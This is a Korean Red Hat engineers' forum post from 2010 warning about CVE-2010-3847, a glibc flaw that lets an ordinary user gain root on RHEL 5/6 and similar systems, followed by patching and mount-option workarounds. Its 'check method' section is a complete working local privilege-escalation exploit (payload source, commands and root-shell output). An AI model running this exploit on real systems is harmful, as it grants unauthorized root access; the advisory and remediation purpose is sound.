REDHAT 엔지니어 기술공유 카페 | [긴급]RHEL 5 & RHEL 6 일반계정이 root 권한을 획득하게되는 취약성 - Daum 카페

<p>오늘 새벽에 날라온 메일의 취약성입니다.<br>문서번호는 CVE-2010-3847로 해당 취약성은 sticky bit를 가지는 명령어(ping,passwd등.. )를 다이나믹 링크(ld.so)를 통해 실행하면서 발견된 문제로 , 일반계정 사용자가 쉽게 이 취약성을 이용해 root계정을 획득하게되는 중요한 보안 이슈 입니다.</p> <p>실제 패키지는 glibc상의 소스코드상의 취약성입니다.</p> <p>아래는 일반계정으로 root계정을 득하는 예제입니다.<br>RHEL 5와 RHEL 6(CENT OS 포함)에서 모두 가능합니다. </p> <p> </p> <p>성공적으로 이 취약성을 이용하려면 SUID또는 SGID 바이너리가 공격자가 해당 디렉토리를 쓰는 권한을 가지고 같은 파일시스템에 위치해야 한다. 예를 들어 , /tmp와 /usr 이 둘다 / 상에 올라가 있다면 필요한 조건이 충족된 것이고, glibc 라이브러리 로더는 수정된 코드를 로딩하여 속일 수 있고 실행할 수 있는 SUID또는 SGID의 권한 으로 실행될 수 있다. <br></p> <p><strong></strong> </p> <p><strong>>>> 이 취약성에 해당되는 버젼(Tested) </strong></p> <p><strong>RedHat Enterprise Server 5.x</strong></p><p><strong>CentOS 5.x</strong></p><p><strong>페도라 13 </strong></p><p><b><p>Ubuntu 10</p><div><font class="Apple-style-span" color="#000000" face="Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace" size="4"><span class="Apple-style-span" style="border-collapse: collapse; font-size: 16px; font-weight: normal; line-height: 17px; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px;"><font class="Apple-style-span" color="#5C5C5C" face="gulim" size="3"><span class="Apple-style-span" style="border-collapse: separate; font-size: 12px; line-height: 18px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;"><b><br></b></span></font></span></font></div></b></p> <p><a href="http://seclists.org/fulldisclosure/2010/Oct/257">http://seclists.org/fulldisclosure/2010/Oct/257</a></p> <p>CVE-2010-3847</p> <p> </p> <p> </p> <p><font style="BACKGROUND-COLOR: #ffffff"><strong>>>>취약성 점검 방법(root 권한 획득)</strong></font></p> <p> </p> <p><font style="BACKGROUND-COLOR: #ffffff">우선 일반계정으로 SSH또는 TELNET등으로 접속 한후 아래의 진행</font></p> <p> </p> <p><font style="BACKGROUND-COLOR: #ffffff">$ cd /tmp<br>$ cat > payload.c<br>void __attribute__((constructor)) init()<br>{<br>    setuid(0);<br>    system("/bin/bash");<br>}<br>^D (ctrl +d)</font><font style="BACKGROUND-COLOR: #ffffff"><br></font></p><font style="BACKGROUND-COLOR: #ffffff"> <p><br> </p></font> <p><font style="BACKGROUND-COLOR: #ffffff">$ mkdir /tmp/exploit<br>$ ln /bin/ping /tmp/exploit/target<br>$ exec 3< /tmp/exploit/target<br>$ ls -l /proc/$$/fd/3<br>lr-x------ 1 test test 64 10월 21 09:38 /proc/16189/fd/3 -> /tmp/exploit/target<br>$ rm -rf /tmp/exploit/<br>$ ls -l /proc/$$/fd/3<br>lr-x------ 1 test test 64 10월 21 09:38 /proc/16189/fd/3 -> /tmp/exploit/target (deleted)<br>$ cat payload.c<br>void __attribute__((constructor)) init()<br>{<br>    setuid(0);<br>    system("/bin/bash");<br>}<br>$ gcc -w -fPIC -shared -o /tmp/exploit payload.c<br>gcc: spec failure: unrecognized spec option 'M'<br>gcc: spec failure: unrecognized spec option 'M'<br># LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3<br># whoami<br>root</font></p> <p> </p> <p><font style="BACKGROUND-COLOR: #ffffff">이제 ROOT권한을 획득하였음. </font></p> <p> </p> <p><font style="BACKGROUND-COLOR: #ffffff"><strong>>>> 이에 대한 해결안 대략 2가지 </strong></font></p> <p><font style="BACKGROUND-COLOR: #ffffff">1. 보통 두가지 해당 패키지를 YUM으로 업데이트 할것</font></p> <p><font style="BACKGROUND-COLOR: #ffffff">2. sticky bit 가 있는 바이러리 디렉토리와 사용자가 쓸 수 있는 디렉토리를 파티션으로 분리할 것</font></p><font style="BACKGROUND-COLOR: #ffffff"> <p> </p> <p><br> </p></font> <p><strong>>>> 주의사항</strong></p> <p>-  이 패치를 위해서는 RHN을 사용할 수 있어야 합니다.</p> <p> </p> <p> </p> <p><strong>>>> 관련 글</strong></p> <p>How can I apply security patches for a Red Hat Enterprise Linux system not connected on RHN or the internet?<br><a href="https://access.redhat.com/kb/docs/DOC-17189" target="_blank"><u><font color="#800080">https://access.redhat.com/kb/docs/DOC-17189</font></u></a></p> <p style="WIDTH: 98%; WORD-WRAP: break-word; WORD-BREAK: break-all">>>> On a Red Hat Enterprise Linux 5 machine, is it possible to limit yum so that it lists or installs only security updates?<br><a href="https://access.redhat.com/kb/docs/DOC-10022" target="_blank"><u><font color="#800080">https://access.redhat.com/kb/docs/DOC-10022</font></u></a></p> <p style="WIDTH: 98%; WORD-WRAP: break-word; WORD-BREAK: break-all">How do I know if a CVE name affects a Red Hat Enterprise Linux package?<br><a href="https://access.redhat.com/kb/docs/DOC-11331" target="_blank"><u><font color="#800080">https://access.redhat.com/kb/docs/DOC-11331</font></u></a></p> <p> </p> <p> </p> <div style="Z-INDEX: 99995; TEXT-ALIGN: left; PADDING-BOTTOM: 0px; BORDER-RIGHT-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,191); MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: auto; PADDING-RIGHT: 0px; FONT: 13px arial, sans-serif; DIRECTION: ltr; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; HEIGHT: auto; COLOR: rgb(0,0,0); BORDER-LEFT-WIDTH: 0px; PADDING-TOP: 0px; background-origin: initial; background-clip: initial"></div> <div style="Z-INDEX: 99995; TEXT-ALIGN: left; PADDING-BOTTOM: 0px; BORDER-RIGHT-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,191); MARGIN: 0px; PADDING-LEFT: 0px; WIDTH: auto; PADDING-RIGHT: 0px; FONT: 13px arial, sans-serif; DIRECTION: ltr; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; HEIGHT: auto; COLOR: rgb(0,0,0); BORDER-LEFT-WIDTH: 0px; PADDING-TOP: 0px; background-origin: initial; background-clip: initial"></div> <p><br></p><div style="background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 191); border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; color: rgb(0, 0, 0); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; height: auto; line-height: normal; text-align: left; width: auto; direction: ltr; z-index: 99995; background-position: initial initial; background-repeat: initial initial; "></div><div style="z-index: -1; position:absolute; top:0px; left: 0px; width: 100%; height: 1394px;"></div><p><br></p>

카페정보

REDHAT 엔지니어 기술공유 카페

카페 전체 메뉴

▲

카페 게시글

목록 이전글 다음글

보안 [긴급]RHEL 5 & RHEL 6 일반계정이 root 권한을 획득하게되는 취약성

이누기 추천 0 조회 1,325 10.10.21 11:27 댓글 4

게시글 본문내용

다음검색

저작자 표시 컨텐츠변경 비영리

댓글

이누기
작성자 10.10.21 13:45

첫댓글 참고 : http://cafe.daum.net/redhat/D4GV/18
이누기
작성자 10.10.21 14:18

>>> 패치방법
yum install yum-security
yum update --cve CVE-2010-3847
삐꾸강아쥐
10.10.21 16:43

좋은 정보 감사 합니다... 퍼갑니다~~~
이누기
작성자 10.10.25 20:56

사용자가 nosuid 없이 마운트된 파일시스템에 파일을 만드는 것으로부터 방지하는 임시적인 방법입니다.
이는 우회할 수 있는 방법이 있으므로 임시적인 방법입니다.
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp

검색 옵션 선택상자

댓글내용선택됨 옵션 더 보기

댓글내용

댓글 작성자

연관검색어

환율

환자

환기

최신목록